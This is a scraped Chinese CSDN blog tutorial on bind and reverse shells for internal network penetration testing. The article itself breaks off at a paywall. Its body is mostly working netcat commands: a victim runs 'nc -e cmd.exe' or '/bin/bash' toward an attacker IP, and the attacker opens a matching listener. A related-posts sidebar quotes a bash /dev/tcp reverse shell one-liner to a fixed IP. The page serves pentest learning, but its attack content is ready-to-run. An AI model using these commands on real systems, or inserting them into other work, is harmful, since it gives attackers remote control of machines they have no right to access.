内网渗透之反弹shell

最新推荐文章于 2024-06-27 10:40:56 发布
最新推荐文章于 2024-06-27 10:40:56 发布
阅读量879 收藏 1
点赞数
分类专栏: 安全相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41038905/article/details/113476949
版权

蚕吐丝,蜂酿蜜,人不学,不如物!

场景1

步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入)

nc -lvp 4444 -e cmd.exe (反弹windows shell)
nc -lvp 4444 -e /bin/bash (反弹linux shell)

步骤二:攻击机连接被控服务器的4444端口(攻击机输入)

nc -nv 受害机ip 4444

场景2

2利用nc反弹shell
条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限不够时利用nc反向连接)
方式:tcp连接是被控服务器发起,连接外网攻击机
步骤一:外网服务器监听4444端口
(攻击机输入)

nc -lvp 4444

步骤二:在被控服务器反弹shell到外网服务器的4444端口
(受害机输入)

nc -e cmd.exe 攻击机ip 4444(反弹windows shell)
nc -e /bin/bash 攻击机ip 4444(反弹linux shell)

场景三

网络配置情况
内网边界机2有两个网卡,一个与攻击机1同网段,一个与目标服务器3同网段(攻击机1的ip:192.168.16.130,内网边界机2的ip:192.168.16.129和10.1.1.1,目标服务器3的ip:10.1.1.2)此时1-2&#x

最低0.47元/天 解锁文章
博闻善行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 694
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1059
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
内网渗透-反弹Shell
道阻且长,行则将至。
07-07 3239
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
把手教你如何进行内网渗透
最新发布
cc123489ll的博客
06-27 691
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。实操部分写的比较草率,主要是为了增强认知、扩展思路、扩充知识面。实际上有很多优秀的集成化工具,很少会拆分开来单独使用这些方法。
python连接netcat监听的端口_权限不足?端口被占?内网渗透反弹Shell
weixin_39747630的博客
12-05 284
原标题:权限不足?端口被占?内网渗透反弹Shell反弹Shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形...
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2019
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
内网渗透之Linux反弹shell(综合)
不知名白帽的博客
08-26 3797
01NC正向Shell、02NC反向Shell、03Bash反弹Shell、04Perl反弹Shell、05Python反弹Shell、06PHP反弹Shell、07Ruby反弹Shell、08Telnet反弹Shell、09OpenSSL反弹Shell
内网渗透中,反弹shell的各种姿势
热门推荐
weixin_43526443的博客
12-13 7万+
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。 1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1 命令介绍: nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,
内网渗透之Linux反弹shell(一)
不知名白帽的博客
08-22 2224
内网渗透之Linux反弹shell(一)(Linux mkfifo命令基本用法、Linux标准文件描述符、重定向、01NC正向Shell、02NC反向Shell)
后渗透——内网转发之反弹shell
爱国小白帽
03-16 3348
内网转发目的 渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。 内网转发三种形式 反弹shell 在攻击者机器,获取受害者机器的命令行 反弹端口 受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口 也叫端口转发 反弹代理 将攻击者的流量,转发到内网其他服务器上 实验环境: 瑞士军刀nc Windows ...
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
fscan内网渗透神器
09-21
它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 2.主要功能 (1)信息搜集: 存活探测...
内网渗透综合实验.docx
08-29
本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据交换的过程。在本实验...
内网渗透流程与思路和工具讲解
04-10
例如fscan是一款用go语言编写的开源内网综合扫描工具,支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控...
linux内网渗透1
08-03
本文主要涉及的是Linux内网渗透的相关技术与步骤,主要分为以下几个部分: 1. **漏洞利用**: 提到了Wooyun上的一个漏洞(wooyun-2015-0144595),这个漏洞是针对Glassfish应用服务器的。攻击者通过该漏洞可以读取...
IDA PRO7.0安装及问题解决
weixin_41038905的博客
11-15 6112
1.安装,下载IDA7.0(便携版,免安装) 链接:https://pan.baidu.com/s/1_jb9WWWUlXbCrHUMbn7ZJQ 提取码:au7t 2.安装keystone-0.9.1-python-win64,点击下载 2.打开IDA是碰到问题 keypatch.py ERROR: fail to load the dynamic library 解决方法: On Windows, if you get an error message from IDA about “fail to l
SSH反向代理使用
weixin_41038905的博客
02-09 5360
SSH反向代理 先说说什么是代理,源服务器由于各种原因无法访问目标服务器提供的服务,但是存在一个agent服务器,源服务器可以访问它,它可以访问目标服务器,那么源服务器的消息发给他,它在把请求转发给目标服务器,就间接的实现了源服务器访问目标服务器的目的。 这就是代理,也是一般所说的正向代理,正向代理一般是代理客户端(源服务器,信息的请求者)。这时候,在公网上发送的信息的请求者就是代理服务器的身份,而不是真正客户端的身份。好处显而易见,隐藏客户端的身份。 反向代理 百度百科:当一个代理服务器能够代理外部网络
ctf中pwn题目总结
weixin_41038905的博客
11-16 4711
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
链路聚合可以在不同网段
07-11
链路聚合(Link Aggregation)通常是在同一网段内进行配置的。链路聚合是将多个物理链路组合成一个逻辑链路,以提高带宽和冗余性。 在链路聚合中,多个物理链路被视为一个逻辑链路,它们共享同一个IP地址和子网掩码。因此,链路聚合需要在同一网段内配置,以确保所有链路能够正常通信。 如果你想在不同网段之间实现聚合效果,可以考虑使用其他技术,如虚拟局域网(VLAN)或隧道技术来实现。这些技术可以在不同的网段之间创建逻辑连接,并提供类似于链路聚合的带宽增加和冗余性。 需要注意的是,具体的配置方法和可行性可能会因设备和网络拓扑而有所不同。建议参考设备的官方文档或咨询厂商的技术支持人员,以获取针对你的设备型号和网络需求的详细配置说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值